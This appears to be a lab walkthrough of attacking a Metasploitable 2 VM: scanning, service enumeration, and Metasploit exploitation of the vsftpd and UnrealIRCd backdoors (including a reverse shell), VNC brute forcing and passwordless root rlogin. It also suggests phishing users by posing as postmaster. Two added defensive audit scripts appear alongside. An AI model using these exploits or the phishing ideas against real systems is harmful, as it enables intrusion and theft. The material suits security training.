- Kali – 192.168.56.101
- Metasploitable – 192.168.56.102
- Replace these IPs with your own as appropriate.
Contents
- 1 Footprinting
- 2 Scanning
- 2.1 Port Scanning
- 2.2 OS Fingerprinting
- 3 Enumeration
- 3.1 FTP (TCP 21) Enumeration
- 3.2 Telnet (TCP 23) Enumeration
- 3.3 SMTP (TCP 25) Enumeration
- 3.4 VNC (TCP 5900) Enumeration
- 3.5 X11 (TCP 6000) Enumeration
- 3.6 RLogin (TCP 513) Enumeration
- 3.7 IRC (TCP 6667) Enumeration
- 4 Exploitation
- 4.1 FTP Exploit
- 4.2 VNC Password Cracking
- 4.3 IRC Exploit
Ping
Let’s ping the victim machine to ensure it’s up and accessible.

```
root@kali:~# ping -c 3 192.168.56.102
PING 192.168.56.102 (192.168.56.102) 56(84) bytes of data.
64 bytes from 192.168.56.102: icmp_seq=1 ttl=64 time=0.231 ms
64 bytes from 192.168.56.102: icmp_seq=2 ttl=64 time=0.240 ms
64 bytes from 192.168.56.102: icmp_seq=3 ttl=64 time=0.280 ms

--- 192.168.56.102 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.231/0.250/0.280/0.024 ms
```

There’s 0% packet loss, which means the victim is up.
Traceroute
Let’s run traceroute to check if the victim is hidden behind a firewall.
```
root@kali:~# traceroute 192.168.56.102
traceroute to 192.168.56.102 (192.168.56.102), 30 hops max, 60 byte packets
 1  192.168.56.102 (192.168.56.102)  0.237 ms  0.160 ms  0.124 ms
```
As you can see, there’s only one hop between us and the victim (192.168.56.102). No firewall is blocking us.
Scanning
Port Scanning
```
root@kali:~# nmap -oA metasploitable-scan -sV -T4 -O 192.168.56.102

Starting Nmap 7.01 ( https://nmap.org ) at 2016-04-25 23:55 PDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.102
Host is up (0.00033s latency).
Not shown: 979 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  shell       Netkit rshd
1099/tcp open  rmiregistry GNU Classpath grmiregistry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:6C:48:33 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

Nmap Script Scan

Let’s run an nmap aggressive (-A) scan. This runs a default set of scripts that probe the running services more deeply.
```
root@kali:~# nmap -oA metasploitable-agg-scan -A -T4 192.168.56.102

Starting Nmap 7.01 ( https://nmap.org ) at 2016-04-26 00:00 PDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.102
Host is up (0.0017s latency).
Not shown: 979 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2016-04-25T20:43:52+00:00; -10h17m05s from scanner time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      56724/tcp  mountd
|   100005  1,2,3      59390/udp  mountd
|   100021  1,3,4      46720/udp  nlockmgr
|   100021  1,3,4      57927/tcp  nlockmgr
|   100024  1          33610/tcp  status
|_  100024  1          59516/udp  status
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  shell       Netkit rshd
1099/tcp open  java-rmi    Java RMI Registry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      56724/tcp  mountd
|   100005  1,2,3      59390/udp  mountd
|   100021  1,3,4      46720/udp  nlockmgr
|   100021  1,3,4      57927/tcp  nlockmgr
|   100024  1          33610/tcp  status
|_  100024  1          59516/udp  status
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info:
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 1095
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, Speaks41ProtocolNew, ConnectWithDatabase, SupportsTransactions, SwitchToSSLAfterHandshake, LongColumnFlag, SupportsCompression
|   Status: Autocommit
|_  Salt: *()3f)9~5*r#SW<fmruu
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info:
|   Protocol version: 3.3
|   Security types:
|_    Unknown security type (33554432)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
| irc-info:
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN
|   uptime: 0 days, 1:14:27
|   source ident: nmap
|   source host: 96A9C42D.97684684.FFFA6D49.IP
|_  error: Closing Link: nxszjjhzq[192.168.56.101] (Quit: nxszjjhzq)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:6C:48:33 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.71 ms 192.168.56.102
```
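Since `-oA` also writes a grepable `.gnmap` file, the scan results above can be triaged automatically. The following is an added example, not code from the original post: it parses a `.gnmap` host line (constructed here from the `-sV` results) and flags the findings this walkthrough later turns into shells (the backdoored vsftpd build, the bare root shell on 1524, the cleartext telnet and r-services, and the IRC daemon whose version `-sV` alone does not resolve).

```python
"""Triage an nmap grepable (.gnmap) Host line. Added example; the sample line
is CONSTRUCTED from the -sV results shown above, and the rules encode the
findings the walkthrough identifies, not a general vulnerability database."""
import re

# Constructed .gnmap Host line (fields: port/state/proto/owner/service/rpc/version/).
SAMPLE_GNMAP = (
    "Host: 192.168.56.102 ()\tPorts: "
    "21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, "
    "23/open/tcp//telnet//Linux telnetd/, "
    "25/open/tcp//smtp//Postfix smtpd/, "
    "512/open/tcp//exec//netkit-rsh rexecd/, "
    "513/open/tcp//login///, "
    "514/open/tcp//shell//Netkit rshd/, "
    "1524/open/tcp//shell//Metasploitable root shell/, "
    "5900/open/tcp//vnc//VNC (protocol 3.3)/, "
    "6667/open/tcp//irc//Unreal ircd/"
    "\tIgnored State: closed (979)"
)

PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")
BACKDOORED_BUILDS = {"vsftpd 2.3.4", "Unreal3.2.8.1"}   # builds the post exploits
LEGACY_CLEARTEXT = {"telnet", "exec", "login", "shell"}   # telnetd and the BSD r-services


def parse_gnmap_ports(line):
    """Return one dict per port entry in a .gnmap 'Host:' line."""
    m = re.search(r"\tPorts: (.*?)(?:\t|$)", line)
    if not m:
        return []
    entries = []
    for chunk in m.group(1).split(", "):
        pm = PORT_RE.match(chunk)
        if pm:
            port, state, proto, _owner, service, _rpc, version = pm.groups()
            entries.append({"port": int(port), "state": state, "proto": proto,
                            "service": service, "version": version.strip()})
    return entries


def triage(entries):
    """Map open ports to (severity, port, reason) findings a defender acts on."""
    findings = []
    for e in entries:
        if e["state"] != "open":
            continue
        port, svc, ver = e["port"], e["service"], e["version"]
        if any(b in ver for b in BACKDOORED_BUILDS):
            findings.append(("critical", port, f"known backdoored build: {ver}"))
        elif "root shell" in ver:
            findings.append(("critical", port, f"unauthenticated shell advertised: {ver}"))
        elif svc in LEGACY_CLEARTEXT:
            findings.append(("high", port, f"cleartext legacy remote-access service: {svc}"))
        elif svc == "irc" and not re.search(r"\d", ver):
            findings.append(("info", port, f"'{ver}': version unresolved by -sV, rerun with -A"))
    return findings


if __name__ == "__main__":
    for sev, port, reason in triage(parse_gnmap_ports(SAMPLE_GNMAP)):
        print(f"[{sev:8}] {port:>5}/tcp  {reason}")
```

Run it against the real file with `parse_gnmap_ports(open("metasploitable-scan.gnmap").read().splitlines()[1])` or loop over every line starting with `Host:`.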
OS Fingerprinting
We’ll use both nmap and xprobe2 for active OS fingerprinting, as they use different techniques. nmap infers the victim’s TCP/IP stack implementation, and from there the OS, while xprobe2 guesses the OS by how closely the probe responses match a signature in its signature database.
nmap
According to the nmap script scan, the OS is Linux 2.6.x. Also, the victim is running the Ubuntu builds of several services like Apache, OpenSSH, and MySQL, which tells us the victim’s Linux distribution.
xprobe2
```
root@kali:~# xprobe2 -p metasploitable-os-det -X 192.168.56.102

Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu

[+] Target is 192.168.56.102
[+] Loading modules.
[+] Following modules are loaded:
[x] [1] ping:icmp_ping  -  ICMP echo discovery module
[x] [2] ping:tcp_ping  -  TCP-based ping discovery module
[x] [3] ping:udp_ping  -  UDP-based ping discovery module
[x] [4] infogather:ttl_calc  -  TCP and UDP based TTL distance calculation
[x] [5] infogather:portscan  -  TCP and UDP PortScanner
[x] [6] fingerprint:icmp_echo  -  ICMP Echo request fingerprinting module
[x] [7] fingerprint:icmp_tstamp  -  ICMP Timestamp request fingerprinting module
[x] [8] fingerprint:icmp_amask  -  ICMP Address mask request fingerprinting module
[x] [9] fingerprint:icmp_port_unreach  -  ICMP port unreachable fingerprinting module
[x] [10] fingerprint:tcp_hshake  -  TCP Handshake fingerprinting module
[x] [11] fingerprint:tcp_rst  -  TCP RST fingerprinting module
[x] [12] fingerprint:smb  -  SMB fingerprinting module
[x] [13] fingerprint:snmp  -  SNMPv2c fingerprinting module
[+] 13 modules registered
[+] Initializing scan engine
[+] Running scan engine
[-] ping:tcp_ping module: no closed/open TCP ports known on 192.168.56.102. Module test failed
[-] ping:udp_ping module: no closed/open UDP ports known on 192.168.56.102. Module test failed
[-] No distance calculation. 192.168.56.102 appears to be dead or no ports known
[+] Host: 192.168.56.102 is up (Guess probability: 50%)
[+] Target: 192.168.56.102 is alive. Round-Trip Time: 0.49599 sec
[+] Selected safe Round-Trip Time value is: 0.99198 sec
[-] icmp_port_unreach::build_DNS_reply(): gethostbyname() failed! Using static ip for www.securityfocus.com in UDP probe
[-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
[-] fingerprint:smb need either TCP port 139 or 445 to run
[-] fingerprint:snmp: need UDP port 161 open
[+] Primary guess:
[+] Host 192.168.56.102 Running OS: "Linux Kernel 2.6.11" (Guess probability: 95%)
[+] Other guesses:
[+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.20" (Guess probability: 95%)
[+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.30" (Guess probability: 95%)
[+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.22" (Guess probability: 95%)
[+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.28" (Guess probability: 95%)
[+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.24" (Guess probability: 95%)
[+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.26" (Guess probability: 95%)
[+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.26" (Guess probability: 95%)
[+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.24" (Guess probability: 95%)
[+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.28" (Guess probability: 95%)
[+] Cleaning up scan engine
[+] Modules deinitialized
[+] Execution completed.
```
According to xprobe2, the OS is Linux 2.6.11. This confirms the nmap results.
Enumeration
FTP (TCP 21) Enumeration
According to our nmap aggressive scan, anonymous FTP login is enabled. Often we can get access to the entire file system via FTP. Then, since this is an older Linux system, we can steal /etc/passwd and crack the password hashes using hashcat.
So let’s connect. For the password, type in anything.
```
root@kali:~# ftp -v 192.168.56.102
Connected to 192.168.56.102.
220 (vsFTPd 2.3.4)
Name (192.168.56.102:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
```
Login successful. What do we have access to?
```
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp>
```
Nothing is listed, so we can’t access the entire machine. However, we can use FTP to upload a malicious executable that would compromise the system. That’s beyond enumeration, however.
Vsftpd 2.3.4 exploit

The nmap -A scan tells us the FTP version, 2.3.4. This FTP version has been backdoored. There’s a Metasploit exploit (exploit/unix/ftp/vsftpd_234_backdoor) for this vulnerability which should give us a command shell. We’ll do this in “Exploitation”.

Telnet (TCP 23) Enumeration
Connect using telnet and grab the banner.

```
root@kali:~# telnet 192.168.56.102
Trying 192.168.56.102...
Connected to 192.168.56.102.
Escape character is '^]'.
[ASCII-art "metasploitable 2" banner]

Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started

metasploitable login:
```

We’re given the login credentials! Let’s log in:

```
metasploitable login: msfadmin
Password:
Last login: Mon Apr 25 17:33:10 EDT 2016 from 192.168.56.101 on pts/3
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
...
msfadmin@metasploitable:~$
```
Great! We now have a user-level shell into the victim. We also learned msfadmin is a username. This enables us to brute force passwords.
SMTP (TCP 25) Enumeration
Let’s connect to the victim’s SMTP server using nc (netcat) and enumerate some users using the VRFY command. Let’s try root and msfadmin (which we discovered in “Telnet enumeration”).

```
root@kali:~# nc 192.168.56.102 25
220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
vrfy root
252 2.0.0 root
vrfy msfadmin
252 2.0.0 msfadmin
```
Both work. To enumerate more usernames, let’s use a Metasploit module (auxiliary/scanner/smtp/smtp_enum).

```
msf auxiliary(smtp_enum) > show options

Module options (auxiliary/scanner/smtp/smtp_enum):

   Name       Current Setting                                                 Required  Description
   ----       ---------------                                                 --------  -----------
   RHOSTS                                                                     yes       The target address range or CIDR identifier
   RPORT      25                                                              yes       The target port
   THREADS    1                                                               yes       The number of concurrent threads
   UNIXONLY   true                                                            yes       Skip Microsoft bannered servers when testing unix users
   USER_FILE  /usr/share/metasploit-framework/data/wordlists/unix_users.txt  yes       The file that contains a list of probable users accounts.

msf auxiliary(smtp_enum) > setg RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf auxiliary(smtp_enum) > set THREADS 1000
THREADS => 1000
msf auxiliary(smtp_enum) > run

[*] 192.168.56.102:25 Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
[+] 192.168.56.102:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, news, nobody, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

We can use this list of users later on for social engineering attacks. For example, we can masquerade as postmaster and ask a user to email us his username/password. We can also send out malicious payloads, disguised as patches.
VNC (TCP 5900) Enumeration
Let’s connect to VNC using vncviewer:

```
root@kali:~# vncviewer 192.168.56.102::5900
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:
Authentication failure
```
We need the password to connect using VNC. We try a few basic passwords, such as the usernames, but they all fail. We can run a brute force attack against VNC. We’ll do this in “Exploitation”.
X11 (TCP 6000) Enumeration
Let’s use a Metasploit auxiliary module (auxiliary/scanner/x11/open_x11) to check if we can connect without authentication.

```
msf > use auxiliary/scanner/x11/open_x11
msf auxiliary(open_x11) > show options

Module options (auxiliary/scanner/x11/open_x11):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    6000             yes       The target port
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(open_x11) > setg RHoSTS 192.168.56.102
RHoSTS => 192.168.56.102
msf auxiliary(open_x11) > set THREADS 10000
THREADS => 10000
msf auxiliary(open_x11) > run

[*] 192.168.56.102 Access Denied
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Access Denied. Let’s try to SSH into the victim using the telnet credentials, with X forwarding enabled. (Telnet doesn’t support X forwarding.)
```
root@kali:~# ssh msfadmin@192.168.56.102 -X
msfadmin@192.168.56.102's password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
...
Last login: Mon Apr 25 18:35:38 2016 from 192.168.56.101
/usr/bin/X11/xauth:  /home/msfadmin/.Xauthority not writable, changes will be ignored
```
SSH works! Let’s try to open a GUI application like firefox:

```
msfadmin@metasploitable:~$ firefox
X11 connection rejected because of wrong authentication.
X11 connection rejected because of wrong authentication.
Error: cannot open display: localhost:10.0
```

Seems like the msfadmin user doesn’t have permission for X forwarding. We can return to this after rooting the victim.
RLogin (TCP 513) Enumeration
Let’s use rlogin to try to connect as root.

```
root@kali:~# rlogin -l root 192.168.56.102
Last login: Mon Apr 25 18:53:27 EDT 2016 from 192.168.56.101 on pts/1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
...
root@metasploitable:~# whoami
root
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
```
We obtained root access. No password was required at all!
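A passwordless rlogin like the one above is what a defender should be able to find before an attacker does. The following is an added example, not code from the original post, and it assumes the usual netkit/BSD r-service semantics: rlogind trusts "host [user]" lines from /etc/hosts.equiv (for non-root users) and from the target account's ~/.rhosts, with "+" standing for any host or any user and a leading "-" denying. The sample file contents are constructed.

```python
"""Audit BSD r-service trust files for wildcard entries that grant passwordless
rlogin. Added example; assumes netkit/BSD hosts.equiv and .rhosts semantics
(host [user] per line, '+' = any, leading '-' = deny). Samples are CONSTRUCTED."""
from pathlib import Path

# Constructed samples: the first is the classic "trust everyone as root" entry.
SAMPLE_ROOT_RHOSTS = "+ +\n"
SAMPLE_HOSTS_EQUIV = "# trusted build hosts\nbuild01\n+@admins\n-badhost\n"


def parse_trust_file(text):
    """Yield (host, user) pairs; user is None when a line names only a host."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # strip comments and blank lines
        if not line:
            continue
        parts = line.split()
        yield parts[0], (parts[1] if len(parts) > 1 else None)


def risky_entries(text, account):
    """Return findings for wildcard trust in one file, labelled by account."""
    findings = []
    for host, user in parse_trust_file(text):
        if host.startswith("-"):
            continue                              # explicit deny entry
        if host == "+" and user == "+":
            findings.append(f"{account}: '+ +' trusts any user from any host (passwordless login)")
        elif host == "+":
            findings.append(f"{account}: '+' trusts every host for user {user or account}")
        elif user == "+":
            findings.append(f"{account}: '{host} +' trusts every user on {host}")
    return findings


def audit_system(root=Path("/")):
    """Read the live trust files. hosts.equiv never covers root, so root's own
    .rhosts is what decides passwordless 'rlogin -l root'. Returns findings."""
    findings = []
    equiv = root / "etc" / "hosts.equiv"
    if equiv.is_file():
        findings += risky_entries(equiv.read_text(errors="replace"), "hosts.equiv")
    homes = [root / "root"]
    if (root / "home").is_dir():
        homes += sorted(p for p in (root / "home").iterdir() if p.is_dir())
    for home in homes:
        rhosts = home / ".rhosts"
        if rhosts.is_file():
            findings += risky_entries(rhosts.read_text(errors="replace"), home.name)
    return findings


if __name__ == "__main__":
    for finding in audit_system() or ["no wildcard r-service trust found"]:
        print(finding)
```

Pass a mounted image as `audit_system(Path("/mnt/victim"))` to check a system offline.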
IRC (TCP 6667) Enumeration
The nmap -A scan tells us the victim is running UnrealIRCD 3.2.8.1, which has been backdoored. We can exploit this vulnerability using an existing Metasploit module in the next section.
Exploitation
FTP Exploit
The victim is running Vsftpd 2.3.4, which has been backdoored. In Metasploit, we use exploit/unix/ftp/vsftpd_234_backdoor:

```
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(vsftpd_234_backdoor) > setg RHOST 192.168.56.102
RHOST => 192.168.56.102
msf exploit(vsftpd_234_backdoor) > run

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.56.101:34688 -> 192.168.56.102:6200) at 2016-04-26 16:14:51 -0700

whoami
root
id
uid=0(root) gid=0(root)
```
We’ve obtained a root-level shell!
VNC Password Cracking
Let’s use the Metasploit auxiliary module auxiliary/scanner/vnc/vnc_login to attack the VNC service.

```
msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) > set THREADS 1000
THREADS => 1000
msf auxiliary(vnc_login) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf auxiliary(vnc_login) > run

[*] 192.168.56.102:5900 - Starting VNC login sweep
[+] 192.168.56.102:5900 - LOGIN SUCCESSFUL: :password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Password found: password. Let’s log in with this password.

```
root@kali:~# vncviewer 192.168.56.102
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
```
It works! A vncviewer window opens. Metasploitable is headless, so vncviewer itself isn’t that helpful to us. However, we can open GUI applications from here. For example, we can open firefox and search for stored passwords. In any case, we have a root shell!
IRC Exploit
Again, the victim is running UnrealIRCD 3.2.8.1, which has also been backdoored. In Metasploit, let’s use exploit/unix/irc/unreal_ircd_3281_backdoor:

```
msf exploit(unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 192.168.56.101:4444
[*] Connected to 192.168.56.102:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo x2MPL9s60Vy5WKRQ;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "x2MPL9s60Vy5WKRQ\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.56.101:4444 -> 192.168.56.102:34414) at 2016-04-26 16:01:10 -0700

whoami
root
id
uid=0(root) gid=0(root)
```
We’ve obtained another root-level shell.